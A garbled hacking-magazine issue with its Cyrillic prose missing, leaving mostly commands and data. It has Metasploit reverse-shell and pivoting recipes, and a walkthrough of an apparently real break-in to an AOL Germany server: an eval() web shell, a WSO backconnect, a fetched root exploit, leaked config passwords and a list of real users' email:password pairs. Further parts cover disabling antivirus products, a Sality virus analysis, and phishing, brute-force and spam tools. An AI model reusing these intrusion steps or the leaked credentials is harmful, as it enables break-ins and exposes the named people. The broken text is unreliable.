2.0 script.aculous.
AppCodeScan 1.2
.
,

Web 2.0, ,
, HITB, Blackhat .

HitbJob,
,
, , ,
- . ,
Google, .
, ,
Capture the flag,
.
,
-,
.
, , ,
. ,
! z

059


GreenDog agrrrdog@gmail.com

METASPLOIT
FRAMEWORK
MSF

7 , MSF

, ,

. MSF .
MSF !
.
MSF, , ,
- , .
:).
, . , , / Metasploit .
, . , ,
- .
! MSF 3.4.2.

, MSF,
GTK. , ,

060

3.3 . , msfweb. , , ... !



. , . ,
Java, , MSF XMLRPC ,
.
: msfrpcd,
msfgui. msfgui start
new msfprcd
Win:
1. Cygwin
2. cd /msf3
X 10 /141/ 10

browser_autopwn : /
, ,
PostgreSQL + MSF. db_create
3. msfrpcd -S -U username -P password
S SSL, /
4. msfgui.jar, %MSF%\
msf3\data\gui , (
cygwine):
java jar msfgui.jar

db_autopwn x ( ).
nmap
:
msf> db_nmap PN sV 192.168.0.101

msfgui /, , IP .
-, , . , . ,
, ,
..

, MSF
, .
.
,
PostgreSQL. SQLite - /
, MySQL - . , Postgres . MSF. Win: , postgres
. pgAdmin: ,
(msf_user),
(msf_db). SQL-, , MSF.
msfconsole:
msf> db_driver postgresql
msf> db_connect msf_user:pass@127.0.0.1:5432/msf_db

db_create , , , (
postgres), .
Postgres.
, workspace.
, , /
. , db_workspace .
:
db_service /,
, nmap,
. db_autopwn
p ( );
db_notes , , Nmap, WMap. , db_autopwn, ,
db_notes .
db_vulns , MSF(WMap),
Nessus(OpenVAS), Nexpose.
X 09 /140/ 10

- MSF ,
. ( aux- version
scanner, , scanner/imap/imap_verison).
msf>
msf>
msf>
msf>

use
set
set
run

scanner/portscan/tcp
RHOSTS 192.168.0.101
PORTS 1-1000
-j

,
MSF, resource.
MSF. ,
meterpreter.
(metrevhandl.rc) :
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 4444
set LHOST 192.168.0.102
exploit j
back

resource:
msf> resource metrevhandl.rc

. . ,
, , , MSF.
, home/.msf3/msfconsole.rc , msfconsole.
, .

...

WMAP. WMAP MSF -


- . WMAP ,
. -

061

PostgreSQL + MSF. db_edit


, , ,
, Rapid7
w3af , ,
MSF w3af.
( ):
1. wmap:
msf> load db_wmap
2. :
msf> wmap_targets -a http://www.example.com/
3. :
msf> wmap_run -t
msf> wmap_run e

db_vulns, db_notes.
. setg.
WMAP (wmap_crawler) (wmap_proxy).
MSF scanner/http/sqlmap.
SQLmap. , ,
:). sqlmap.
sourceforge.net.
db_autopwn. MSF
:
-R , ;
-m .
:

!
.
/. ,
(JavaScript) . ,
User-Agent, .
,
, ,
. .

( )
.
, 192.168.0.102:
msf>
msf>
msf>
msf>

use server/browser_autopwn
set LHOST 192.168.0.102
set URI index.php
exploit -j

http://192.168.0.102/index.php
(. ).

VBA

EasyHack MSF,
exe- . , ,
. - :

msf> db_autopwn -t -p -m windows -R excellent

Win-.
, 3.3.1 Nexpose MFS
.
1. Nexpose:
msf> load nexpose
msf> nexpose_connect msf_user:pass@127.0.0.1
2. :
msf> nexpose_scan -R excellent -x 192.168.0.101

BROWSER_AUTOPWN

,
, ,
.
, HTTP-
. ,
, -

062

msfpayload windows/shell_bind_tcp LPORT=5555 V >


macros.vba

, ,
. VBA,
(MACRO CODE) ( >

:
msfconsol Tab, -h.
Ctrl+C, Ctrl+Z.
cygwin /
, Shift+Insert.
msfcli, msfpayload .. cygwin. ,
.
X 10 /141/ 10

INFO

info

, , .
,

MSF
netcat

metasploit:
offensive-security.
com/metasploitunleashed/
metasploit.com

VB),
(PAYLOAD DATA). - .
( OfficeXP,
), !
. ,
,
.
5555 .

(payload)
. MSF ,
( Win*), . -, ,
(ruby, perl).
:
Inline .
, ;
Stager , .
,
, ;
Ord . ,

DLL;
Bind ;
Reverse -;
Findport , , .
;
Findtag ,
4- .;
Exec, Download_exec, Up_exec
, / ;
Meterpreter :);
VNC VNC- ;
dllinjection DLL .
DLL ;
metsvc meterpreter ;
PassiveX ActiveX.
NoNX
DEP;
DNS , , IP;
HTTPS ,
HTTPS- (, ).
PassiveX, .
,
ActiveX, X 10 /141/ 10

Meterpreter
IE HTTP-. ,
, - ,
NAT , HTTP- -.
, .
(
) IE.

(192.168.0.102:443):
msfpayload windows/meterpreter/reverse_http
PXHOST=192.168.0.102 PXPORT=443 PXURI=/ X >
reflmeter102.exe
msf> use exploit/multi/handler
msf> exploit -p windows/meterpreter/reverse_
http -o PXHOST=192.168.0.102,PXPORT=443,PXU
RI=/

, PassiveX IE6,
IE7/8.
. , ,
, meterpreter,
.
.
(192.168.0.101) 5678 .

063

WMAP . ,
:)


winenum.rb
MSF:
msf> use exploit/multi/handler
msf> exploit -p windows/shell_bind_tcp -o
RHOST=192.168.0.101,RPORT=5678

,
meterpreter, . MSF
meterpreter , , (
). . ,
(
), (, 1):
msf> setg LHOST 192.168.0.102
msf> setg LPORT 6666
msf> sessions u 1

.
, meterpretere.
(linux, Macos), - . , -,
: - meterpreter
PHP! -,
PHP, .
.
. MSF
, .
, :).
. MSF,
, 192.168.0.103:5555.
80 netcat:
ncat --sh-exec ncat 192.168.0.103 5555 l 80
--keep-open

payload IP ( DNS) .
, netcat SSL, ,
.

,
meterpreter. , meterpreter, -

064

, ( ,
chroot) ( -, , ,
) :).
,
(192.168.146.129) (192.168.0.102)
-.
(, , )
msfconsol:
msf>

route add 192.168.146.0 255.255.255.0 1

, nmap ,
. , ( - )
(. )
MSF.
( ),
, , meterpreter :
meterpreter> portfwd add -l 8008 -p 2222 -r
192.168.0.101

payload LHOST=192.168.146.129,
LPORT=8008, -.
Meterpreter -. .
msf3\scripts\meterpreter,
run Tab ( , :).
run, AutoRunScript
InitialAutoRunScript /. , .
, :
winenum ;
persistence, metsvc meterpreter
;
getcountermeasure , .

- ( ,
) , ,
, . ,
, ,
MFS, , , . ,
!z
X 10 /141/ 10


Anonymous

AOL

AOL
AOL
. :
AIM, AOL Mail ICQ, ,
,
aol.com (-50
). , ,
XSpider 7.7 AOL,
64.12.0.0 64.12.255.255. ...
DETECTED

,
, alex-aolde-mtc02.evip.aol.
com, http://
alex.aol.de .
, CMS Joomla
1.5.x.
, OWASP Joomla!
Security/Vulnerability Scanner YGN Ethical Hacker Group
( ).
, , :
C:/Perl/bin/perl5.12.1.exe C:/joomscan/joomscan.pl -u
http://alex.aol.de

066

:
* Deduced version range is : [1.5.12 1.5.14]
...
# 14
Info -> Core: Admin Backend Cross Site Request
Forgery Vulnerability
Versions effected: 1.0.13 <=
Check: /administrator/
Exploit: It requires an administrator to be logged in
and to be tricked into a specially crafted webpage.
Vulnerable? Yes
...
# 19
Info -> CorePlugin: TinyMCE TinyBrowser addon
X 10 /141/ 10

!
...

var $secret = 'NAAgXewXco6BSw2d';


...
var $host = 'localhost';
var $user = 'alex';
var $db = 'test';

multiple vulnerabilities
Versions effected: Joomla! 1.5.12
Check: /plugins/editors/tinymce/jscripts/tiny_mce/
plugins/tinybrowser/
Exploit: While Joomla! team announced only File
Upload vulnerability, in fact there are many. See:
http://www.milw0rm.com/exploits/9296
Vulnerable? Yes

OWASP

,
, OWASP DirBooster (, , ).
, :
Target URL: http://alex.aol.de/;
Work Method: Auto Switch (HEAD and GET);
Number Of Threads: 200;
Select starting options: Standard start point, Brute
Force Dirs, Brute Force Files;
File extension: php.

, .
: ./info.php (phpinfo), ./pma (phpMyAdmin) ./dnld, (configuration.php, phpMyAdmin-3.3.2-english.tar,
wirwarendrin.tar).
80- wirwarendrin.tar ,
alex.aol.de wirwarendrin.
de, .
, ,
:).


configuration.php,
:
<?php
class JConfig {
X 09 /140/ 10

...
var
var
var
var

$smtpport
$smtpuser
$smtppass
$smtphost

=
=
=
=

'465';
'wirwarendrin';
'Briesben';
'smtp.aol.com';

...
var $password = 'wjedko,lg';
...
}
?>

wirwarendrin@aol.com, , , alex.aol.de.

phpMyAdmin, :).
alex, , ,
:
.
.


PasswordsPro, , , Joomla! md5($pass.$salt).
, http://forum.
antichat.ru/showthread.php?t=13640 PasswordsPro
d86f4c81342b79c4bab8868656c
abe46:t65HKT9iuoOUdvfIAD0JP0ynT6EpRHXb, .
qwertyzuaor, alex.aol.de,
alex.aol.de/administrator.
, , alex.aol.de AOL
,
450 AOL,

:)

AOL INSIDE

:
Extensions Template Manager aol-exit Edit HTML,
/data/servers/wahl-o-mat_aol_de/pages/alex_aol_de/
templates/aol-exit/index.php.
:

067

Joomla!
<?php
eval(stripslashes($_REQUEST[aaa]));
?>

HTML-:
<form action="http://alex.aol.de/templates/aol-exit/
index.php" method="POST">
<input type="text" name="aaa"/>
<input type="submit" value="Pwn It!"/>
</form>

wget WSO-
(http://forum.antichat.ru/thread103155.html) templates
404.php
(, , ).

/data/servers alex.aol.de: editor.aol.fr, gat.aol.co.uk, sns.nexus.aol.com,


wahl-o-mat.aol.de, matrix.aol.de.
,
,
:
cd /data/servers;tar czvf /tmp/1.tgz ./*

, ,
, , :
Linux wahl-o-mat.aol.de 2.6.9-55.ELsmp #1 SMP Fri Apr
20 17:03:35 EDT 2007 i686

,
Back-connect 31337 WSO ( Network) NetCat:
c:/netcat/nc.exe -l -p 31337

,
http://www.exploit-db.com. , ,
wunderbar emporium (http://www.grsecurity.net/~spender/wunderbar_
emporium.tgz).
, , uid=0(root) gid=0(root) groups=11560(httpd):
wget http://www.grsecurity.net/~spender/wunderbar_
emporium.tgz;tar xzfv wunderbar_emporium.tgz;chmod
0777 ./*;./wunderbar_emporium.sh

-
. ifconfig ,

068

joomscan.pl
10.62.134.80.
rpm nmap:
rpm -vhU http://nmap.org/dist/nmap-5.21-1.i386.rpm

:
nmap -v -n -sS 10.62.134.0/24


AOL,
:
Nmap scan report for 10.62.134.89
Host is up (0.00013s latency).
Not shown: 986 closed ports
PORT
STATE SERVICE
22/tcp
open ssh
80/tcp
open http
135/tcp open msrpc
445/tcp open microsoft-ds
1024/tcp open kdm
1041/tcp open unknown
1051/tcp open optima-vnet
1311/tcp open rxmon
1801/tcp open unknown
2099/tcp open unknown
2103/tcp open zephyr-clt
2105/tcp open eklogin
2107/tcp open unknown
3389/tcp open ms-term-serv
MAC Address: 00:18:8B:74:52:6E (Dell)
...
Nmap scan report for 10.62.134.96
Host is up (0.00013s latency).
Not shown: 971 closed ports
PORT
STATE SERVICE
22/tcp
open ssh
88/tcp
open kerberos-sec
135/tcp
open msrpc
139/tcp
open netbios-ssn
389/tcp
open ldap
445/tcp
open microsoft-ds
464/tcp
open kpasswd5
593/tcp
open http-rpc-epmap
636/tcp
open ldapssl
1024/tcp open kdm
1025/tcp open NFS-or-IIS
1027/tcp open IIS
1078/tcp open unknown
1112/tcp open msql
X 10 /141/ 10

INFO

info


./dnld
backconnect WSO-

1311/tcp open rxmon


1801/tcp open unknown
2099/tcp open unknown
2103/tcp open zephyr-clt
2105/tcp open eklogin
2107/tcp open unknown
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-term-serv
9998/tcp open unknown
13722/tcp open netbackup
13782/tcp open netbackup
13783/tcp open netbackup
49152/tcp open unknown
49153/tcp open unknown
MAC Address: 00:13:72:5A:3E:78 (Dell)

, AOL
:).

AOL CONFIDENTIAL


AOL
.
, PasswordsPro alex.aol.de.
, 450 ,
197.

.
:
guenterstaar guenterstaar@aol.com:keiness
thomaskuck thomaskuck@aol.com:sascha
mdfreedom99 marcdrewello@aol.com:Magic23
ClaudiaLangwald ClaudiaLangwald@aol.
com:Silvera
bettyvonloesch bettyvonloesch@aol.com:hanne
Pierre PierreBeneHH@aol.com:wombast
Tenge Tenge@aol.com:derwis
JennySefkow JennySefkow@aol.com:varita
NinaRixenHH@aol.com NinaRixenHH@aol.
com:brauere
Jennifer2706 jennifermatheja@aol.com:elite15
A.V.aus H. voigthh@googlemail.com:Delphines
fkorupp frederickorupp@googlemail.
X 10 /141/ 10

com:wasistdas
KrassowskiSabine@aol.de KrassowskiSabine@
aol.de:Sommer44
neddie annettharksenhh@aol.de:hochzeis
Trixi seebertrixi@aol.de:sommer07
tringasvassiliki tringasvassiliki@aol.
de:perikle
AgnesAB agnesboltzenhh@aol.de:April2008

, :).

: ,
, , , , ebay paypal (!),
.
Company Confidential.
AOL Germany SNAPSHOT SUMMARY as of COB
Date : [2006-02-11]
Business :
AOL
GERMANY (AOL)
FOR [2006-02-11]
-Ending Members 2,687,173
-Registrations 1,824
-Reactivations 146
-Overhead Conversions 1
-Cancellations 1,472
-Terminations 549
-Net Change -50
-Customer Hours 7,301,418
-Total Hours 7,322,081

,
2006-02-11 :).



,


.htaccess

Options
+Indexes.



,

: Order Deny,
Allow
Deny from all

HTTP://WWW
links
http://yehg.net/lab/
pr0js/files.php/joomscan.pl Joomla!
Security/Vulnerability
Scanner
http://www.owasp.
org/index.php/
Category:OWASP_
DirBuster_Project
OWASP DirBuster
Project
http://www.
insidepro.com/eng/
passwordspro.shtml
PasswordsPro
http://www.webhack.ru/download/?
case=info&go=
100 NetCat


, -
.
: ,
phpMyAdmin' ,
,
.
, AOL :).!z

069


icq 884888

X-TOOLS

: RemCam 2
:Windows 2000/XP/2003 Server/
Vista/2008 Server/7
: redsh

:
- ( 180,5 );
- .



? ,
.
,
, RemCam 2,
/-!
:
- -;
- (, );
- RGB,
YUV, JPEG - (BI_RGB, YUY2,
UYVY, NV12, YV12, I420, Y8, MJPG,
);
-
-
;
- JPEG
;
-
( ,
);
- IMA
ADPCM;
-
;
- ZLIB- ;
-

;
- ( md5-
);

070

,
,
redsh.ru/board.
php?feed=programs&id=20 (

RemCam 2).

: aNYfAKE
: *nix/win
: b00zy_c0d3r and The Mafia

,
.

: PHP, fopen, ,
:).
:
1. , ;
2.
;
3. ;
4. ;
5. ,
.


.
:
Fake host (
http://
www.mail.ru, mail.
ru);
Fake path
( -

http://somesite.
ru/adminka/, /
adminka/,
, /);
Fake script
( http://somesite.ru/adminka/
loginhere.php, loginhere.php);
Redirect ,

;
Log type (mail
file);
Email
, ;
File
.


,
http://forum.xeka.ru/
showthread.php?t=142.

: VK Regger
: Windows 2000/XP/2003 Server/
Vista/2008 Server/7
: 0pTik

,
.
:

- ( 10
-);
-
;
-
;
- ;
-
antigate;
- ;
- HTTP Proxy, Socks4,
Socks5;
- 98%.

,


,


, .
: http://forum.antichat.
ru/thread219834.html.
X 10 /141/ 10

, ,
, ( )
Start. ! :)

: ArxFinder
: Windows 2000/XP/2003 Server/
Vista/2008 Server/7
: ArxWolf

: VkFunAdder 0.3
: Windows 2000/XP/2003 Server/
Vista/2008 Server/7
: IOFFE


,
?

(
). VkFunAdder
. ,


:
-
mail:password;
- antigate
;
- ;
- ;
- ;
- .

, ,
,
200 .
P.S.
: http://forum.antichat.ru/
threadnav207277-1-10.html.

: ICQ Light Spam


: Windows 2000/XP/2003 Server/
Vista/2008 Server/7
: q1w2e3


ICQ-,
- - :)
, ICQ Light Spam
-
ICQ. :
X 10 /141/ 10

ICQ-
-
;
-
4000;
- ;
- ;
- ;
- ;
-
;
- ;
- .NET Framework 3.5.


,
!

: ASR Brute
: Windows 2000/XP/2003 Server/
Vista/2008 Server/7
: q1w2e3


q1w2e3,
. , ASR Brute (Answer Secret
Rambler Brute)
Rambler.ru (
,
?). :
- ;
- ( 50
10 );
- ;
-
good.txt;
- bad.txt;
-
dict.txt;
- .


dict.txt,


webxakep.net, ArxFinder
. :
- ;
- + ( 1 100);
- ;
- ( 1 );
- (
30000 15-20%);
- ( 30000
14 );
- , ;
- ;
-
;
- ,
;
-
,
(
);
- ;
- ( );
- Windows
7 Ultimate, Windows 7 Maximum,
Windows Vista Windows XP.

,
/
// ,

ArxFinder.
P.S.
http://webxakep.net/forum/
showthread.php?t=7693.z

071

MALWARE
deeonis deeonis@gmail.com

Nod32, Avast, Avira:



-
, - .
? ?
? ,
. . ,
:).
-
.
ESET
NOD32 4.2.

, , ,
, ,
- .

,
, HIPS (Host Intrusion Prevention System)
.

avast! Free Antivirus.
, ,

072

.
, avast!
Intelligent Scanner,
,
( ,
P2P/ ..).
, , ( ) ,
-, Avira AntiVir Personal.
,

, , ,
Backdoor-, , , ..

,
. ,
.
,
Windows.
Windows XP
Professional SP3.

. ,
.
.
-, X 10 /141/ 10

NOD32.
.
.
,
.
, .
- ,
.
.

. ,
API-.
,
, ,
. -
, , API- .
,
Windows, . ,
. ,
,
.
, , -
, ,
, .


. ,
.
MoveFileEx; .
NULL, MOVEFILE_DELAY_UNTIL_REBOOT, ,

-, .
, .
, .
NOD32 ,
: egui.exe ekrn.exe. , . -
. ,
.
. , , NOD32
.
X 10 /141/ 10

Avira
.
avast avastsvc.exe avasrui.exe,
Avira AntiVir avgnt.exe, avguard.exe, avshadow.exe. ,
... . ,
. ,
, .
.

- , -
. .
, . ,
. ,
, .
. , , . NOD32
exe. .
avast! Free Antivirus Avira AntiVir Personal, ... ,
. . .


, .
MoveFileEx

ESET NOD32

1
2
3
4
5
6

5
5
5
3
2
3
3.8

avast!
Free
Antivirus
5
5
5
3
5
5
4.7

Avira
AntiVir
Personal
5
5
5
3
4
3
4.2

073

MALWARE

avast!

Avira AntiVir Personal


MOVEFILE_DELAY_UNTIL_REBOOT, . , ,
,
.
NOD. ,
, .
. .
. Windows

, , ,
- . ,
, ,
,
.
.
- ,
.
, .
, , Safe mode ,
.
,
.

, ,


,
, , . , ,
, , 95% . ,
100 , ,
, , ,
( ). ?
, . -
, 1,5k
.
?
, , , HIPS' ,
, . ,
.

074

XP. Welcome
, ,
NOD32. . , .
, Avira AntiVir.
, .
, , . , avast!,
Avira, .
,
? , - ,
.
.

Windows XP Professional. ... : gpedit.msc. .


User Configuration, Administrative Templates, System.
Don't run specified Windows applications.
,
. NOD32.
: egui.exe ekrn.exe.
, . OK
. , .
, , ... , ,
. ? .
, ekrn.exe - ,
. .
. . , NOD
, ,
, . Avira
AntiVir. . .
, -
.

,
Malware
, , . ,

, . ,
,
. , ( ) ,
, .
.

X 10 /141/ 10

avast! Antivirus Free


. , .
,
.
. NOD32. NOD
.
, :


msiexec /quiet /uninstall {1A59064A-12A9-469F-99F604BF118DBCFF}

, GUID.
. ,
!
avast! Free Antivirus .
:
C:\Program Files\Alwil Software\Avast5\aswRunDll.exe
"C:\Program Files\Alwil Software\Avast5\Setup\setiface.
dll" RunSetup.

.
,
(. ).
avast . Avira
AntiVir Personal?

. , ,
- , ? . ,
, .

, .
,
. ,
, . NOD32,
,
. Windows.
X 10 /141/ 10

,
UI,
.
. ,
: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\.
ekrn.exe, ekrn,
.
Del Access denied.
.
UI-. HKEY_LOCAL_MACHINE\
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
, egui.exe.
, .
NOD . ,
. ESET NOD32 .
avast.
, NOD. ,
, . ,
, UI- . . Avira AntiVir ,
NOD32 ,
, ,
. .

. , ,
. avast! Free Antivirus
4,7 . Avira AntiVir Personal 4,2 .
ESET NOD32 3,8 . , . , ,
. z

075

MALWARE
,


FakeAPI

Header

Header

PE Virus.Win32.Sality.aa

-:

SALITY.AA


, Virus.Win32.Sality.aa.

FakeAPI .
. , , x86- , , ModRM,
SIB, ,

, .


.

076

.
Virus.Win32.Sality
a 2003 ,
, aa
2008 . ,

.
Virus.Win32.Sality.aa

.



. PE-,
, BackDoor.

.
,
, API-.
X 10 /141/ 10


, , ,
,
, , -,
-.
,
,
0x3000x400 .
, , , FakeApi
. ,
, PoC
(Proof of Concept) .
EPO (Entry Point Obscuring)
Virus.Win32.Zombie.
. .
Sality ,
, , .
.
,
.
,
.
. ,
, . . , , .
PE- Virus.Win32.Sality.aa
. ,
.
? :

, ,

API
,
.
,
.
,
. , . .
, -
.
API- . -
.
, Sality , .
, .
X 10 /141/ 10

. , ,
. ,
. .
:
;
VA ;
VA ;
VA.
, , Sality .
PUSHAD CALL. PUSHAD ,
,
, ,
POPAD,
. CALL,
, (VA) . ,
. .
( , ,
, ):
POP REG;
SUB REG, IMM;
MOV REG, [ESP];
ADD REG, IMM;
ADD [ESP], IMM;
POP REG;

REG 32- , IMM


.
() - (,
REG Sality ):
JMP REG;
CALL REG;
PUSH REG;
RETN;

,

.
, .
,
:
Virus.Win32.Sality.aa
.
, , , ,
. , .
.
,
,
, :
(- -
);

077

MALWARE

.
ModRM;
;
.

2 4 . , ModRM . .
. ,
, , ModRM. , , Mod 3
LEA. ,
x86, Intel, IA-32 Intel Architecture
Software Developers Manual, 2.

X86

, .
, - .


. ? !
. , ,
EAX 0. :
PUSH 0; POP EAX;
XOR EAX, EAX;
MOV EAX, 0;
AND EAX, 0;

,
.
, , ,
. :
PUSHAD; NOP; NOP; NOP; NOP; POPAD; ADD EAX, 0xFFEEFFEE;
INC EAX; OR EAX, EAX; SUB EAX, 0xFFEEFFEF; PUSH EBX; PUSH

0Fh, .
, .
. ,
0B8h MOV eAX, lz, ,
. ,
B8 FF FF FF FF MOV EAX, 0FFFFFFFFh. , , , PUSH EBP 55h, PUSHAD 60h. ,
ModRM.

FakeAPI API,
,


, : Mod, Reg/
Opcode, R/M. Mod , .
3, , . R/M Reg/Opcode .
, , 0x80, 0x81, 0xC1, Reg/Opcode
, .
Mod 3, R/M 4,
SIB. .
, . : ADD EAX, [EAX + ECX*4 + 600].
,
. .
. . :

ECX; POP ECX; POP EBX; LEA EAX, [EAX]; MOV EDX, EDX;


, ,
.

078

F0 Lock; F2 REPNE; F3 REP; 2E CS segment


override; 36 SS // // -; 3E DS // // -; 26 ES
// // -; 64 FS // // -; 65 GS // // -; 66
Operand Size; 67 Address Size;

X 10 /141/ 10

Virus.Win32.Sality.aa

Intel , , , .
, ,
. REPNE/REP
,
, SCASB, MOVSD, LODSW.

, .
Sality? -,
, .
PUSH POP. ,
Mod 3,
, . LEA, Mod 2, 3
. -,
, - : SHLD, BSF,
BTS, BTC, XADD . Sality 66h,
REPxx .
, ,
.
, , .
. Sality . Intel
:
Repeat prefixes (F2H, F3H) cause an instruction to
be repeated for each element of a string. Use these
prefixes only with string instructions (MOVS, CMPS,
SCAS, LODS, STOS, INS, and OUTS). Use of repeat
prefixes and/or undefined opcodes with other IA32 instructions is reserved; such use may cause
unpredictable behavior.

, F2 F3
,
CALL, SHL, TEST
. .

. Sality 64h X 10 /141/ 10

x86
CALL. , !
? , , ,
.
,
, .
. , , ,
,
.

FakeAPI.
.
API-, ,
. FindCl ose GetModuleHandleA.

. -,
EAX ,
, .
-, FindClose
, FindFirstFile.
FindClose (0) ,
. ,
FakeAPI ,
, API-,

.

,
. , Sality
. , ,
. FakeAPI
. , ,
, . ,
, , ,
. z

079


Mifrill mifrill@real.xakep.ru

IT-
Parallels

IT .

,
: ABBYY, Parallels.
,
, , , Parallels,
.

Parallels
. ,

.
, ,
.
( Parallels)

.
,
, , , 20 ,
50 .
,
, ;
:
,


- ().

080
074

, 1992
,
.

. , ,
(, , ..).

-
. ,
, .
, ,
,
, . ,
,
,

:
.

, ,
.
1994, -

,
,
.
, Standard
& Western.
Standard & Western
, ,
- .

,
S&W
. ,

S&W

Rolsen. ,
, .
, ,
, .
-
90- , ,
, .
X 10 /141/ 10

PARALLELS DESKTOP

, Rolsen
Electronics .
. - ,
,
,
16 ERP-.
,


60 S&W
,

Solomon.
S&W ,
, ,
,

:
Parallels 30 55 .
Parallels 500 , , Microsoft, Apple, Intel,
AMD, Dell, HP IBM.
Parallels , , , .
1 . .
Parallels 10 . 125 .
90% 98% Parallels .
Parallels 60%
, 30%, 3%.
Parallels Desktop Mac, , Mac 1
. 2,5 . .

Solomon Software.
,

. ,
,
- , ,

.

.
X 10 /141/ 10

. ,
,
,
, ,
, . ,
. ,

, , ,
.

, ,
, , ,
.
. Solomon

.
:
,
?.
, Standard & Western
,

. , Solomon
Software , . S&W
,
- ERP- Solomon,
.
,
- ;

Pervasive,
Solomon. Standard
& Western
,
.
(-
)
,
Parallels .
,

081

PARALLELS
SUMMIT 2009

,
, ,
. , , , ,
, .

CNEWS AWARD
, ,
1975 ,
. 80- ,
, (
4- ) -
, ,
.
,
,
.
, .
, 14
,
. ,

.
. ,
, (),
, ,
.
,
, Siemens,
, .
-,
.
.
, -

082

,
,
, .
.
,
,
. .
, .
, ,
. :
-
.
Parallels,
( ,
).
,
,
. ,
, ,
. 2000 ,
,
, IBM,
. ,
,
.
,

Parallels ,
, ,
(
15 ). , ,

. , ,
,
700
.


?
,

, ,
,
,
.
, Standard &
Western , 90- ,
. - ,
2000 ,

Solomon Software,
.
, Standard & Western
Software SWsoft.
:
-, Standard & Western
Standard investment, -,
.
,
, ,
dot-com bubble.
, IT- ,
X 10 /141/ 10

.

, SWsoft , .
,

.

,
,
.

SWsoft. ,
, ,
,
. , , ,
(
,
, , -

, -
,
. , , (
,
, , ,
$300 ), SWsoft
.

, .

, ,
.
,
SWsoft
ASP-.
,
,
,
SWsoft.

,
Acronis
). ?..
, ,
. ,
.
,
Microsoft ,
. ,

, , , Linux ASP
(Application Service Providers). ,
,
, - . ,
, , ,
,
ASP
(Application service providers).
SaaS software as a service
.

VMware.


. ,


, - .
,
, SWsoft .
,
X 10 /141/ 10

( Parallels Virtuozzo Containers),


Acronis. ,

IT.


- ,
. , ,
- ...
, ,
SWsoft, . ,
. - Virtuozzo Containers,


,
.
-,
:).

,
, -

. , ,
, SWsoft

( ,
, , ,
). ,

.

, Parallels
.
( ) ,
, ,
- . ,
-
,
, Parallels (
), , . ,
, ,

.
,
. ,
,
, ,
.
, . 2003 .
2004 ,
,
. ,

...
, , . ,
, - , ,
SWsoft Parallels .

SWsoft .

Unix, SWsoft,
Parallels -
R&D .

Parallels .

,
, Parallels .
,
Parallels

083

SWsoft,

. .
Parallels SWsoft,
.
,

? , , ,
.

.
,
,

,
. ,

Parallels . ,

, , :).
,
. 2005 -
Windows, 2006,
,
Parallels Desktop Mac.
, , 2006 ,
Apple Intel,
.
.
,
, . -

084

Parallels Desktop Mac


3,5 .
, Apple
BootCamp,
Windows,
Mac OS. , .

- ,
Mac OS,
. ,

Parallels - -
,
.
( ,
)
Parallels .
2005 ,
SWsoft,

: Bessemer
Venture Partners, Insight Venture Partners
Intel Capital.

, , - .
2003 SWsoft
Plesk Inc.
, , , . Plesk
,

( Parallels Plesk Panel).

Parallels

Virtuozzo Containers, Parallels Workstation,


Parallels Server Mac,
Parallels Desktop
Mac. 2008 Parallels SWsoft,

. -

, ,

.
Parallels , ,
.
,
, . Parallels
,
, - ,
.
- Parallels
,
Parallels ,
.
, Parallels

,
. ? Parallels
, ,
,
,
,
. Parallels
,
.
Parallels
. z
X 10 /141/ 10

PARALLELS

. ,
iPhone Mac. . ,
, . - , , ..
.
-
,
VMware ?
. .

. , ,
. , ,
, BIOS. , .
, . ,
Intel Pentium
.

,
,
.

Parallels Desktop for Mac for Windows Linux ,


, ?
.
,
. ,
. ,
, .
, , :
( - )?
, .
. . , -
. ,
X 10 /141/ 10

, , , . /
, ?
, ,
, - .
. ,
- - .
, ,
. ,
,
. .
- ,
. , - , .
, SmartSelect,
Word-
Windows.
, , Word, ,
,
. . ,
SmartSelect,
SharedFolders, SharedProfiles Coherence. , , -
,
.

085

UNIXOID
Adept adeptg@gmail.com

Linux,
,
Linux
.
.
.

()
, kernel.org, .
2.4.x
( )
( :) )
2.6.x.
-rc, git' rc-git.
7-9 rc-,
. , 4-5 ,
2.6.35.

LINUX-RT
, .
Linux
.
,

086

. , ,

-
.

highload-. ,
, .
www.kernel.
org/pub/linux/kernel/projects/rt/.
2.6.33.6-rt27.
realtime-
. , Ubuntu rt-

Processor type and features


Preemption Mode (Complete Preemption
(Real-Time)). Kernel hacking Check for stack
overflows, .
, : Kernel hacking
Tracers > Kernel Function Tracer, Interrupts-off
Latency Tracer, Interrupts-off Latency Histogram,
Preemption-off Latency Traver, Preemption-off
Latency Histogram, Scheduling Latency Tracer,
Scheduling Latency Histogram, Missed timer
offsets histogram.
PREEMPT RT, :

$ sudo apt-get install linux-rt


.
-

$ uname -v
#1 SMP PREEMPT RT Wed Aug 4 00:40:34
YEKST 2010

X 10 /141/ 10

HTTP://WWW
links

grsecurity
reiser4, reiser4progs.
:

:)

,
:
# echo 1 >/sys/kernel/debug/tracing/latency_
hist/enable/wakeup

:
$ grep -v " 0$" /sys/kernel/debug/tracing/
latency_hist/wakeup/CPU0

: ,
.

BFS
-
(, ) Linux. BFS
(Brain Fuck Scheduler), CFS , , ( ,
BFS
, , , ,
, , ,
). :
www.kernel.org/pub/linux/kernel/people/ck/patches/2.6.
( 2.6.34-ck1) General Setup BFS cpu scheduler.

REISERFS
,
. , ,
. Reiser4 .
(reiser4-for-2.6.34.patch.gz)
: ftp://ftp.kernel.org/pub/linux/kernel/
people/edward/reiser4/reiser4-for-2.6.
File Systems Reiser4.
.
X 10 /141/ 10

kernelnewbies.org
lkml.org

Linux Kernel Mailing
List
liquorix.net
Debian-
,

zen-kernel
grsecurity.net
ccache.samba.org
zen-kernel.org
ksplice.com

$ sudo apt-get install reiser4progs

, :
mkfs.reiser4 reiser4;
fsck.reiser4 reiser4;
measurefs.reiser4
reiser4.

GRSECURITY
,
Linux-.
grsecurity Security options
Grsecurity. : ,
. ,
-
. :
FIFO
( FIFO),
;
* dmesg , root,
;
chroot

chroot.
:
, chroot: mknod (
,
), chroot, sysctl
;
/proc ,
( wheel);
/dev/kmem, /dev/mem /dev/port;
;
( fork(),
, SIGSEGV ).
,
:
/proc /proc
. GID ,
/proc.
chroot: suid,

INFO

info
fakeroot


.

,
sudo.
BFS

Android.
hackbench
(developer.osdl.org/
craiger/hackbench/
src/hackbench.c)

BFS.




.
Kernel Check
(kcheck.sf.net)
python'
,


deb ,
.

087

UNIXOID

ksplice.com. rebootless

nconfig menuconfig

,
, ;
( mount/
umount);
;
( root
).
Security Level
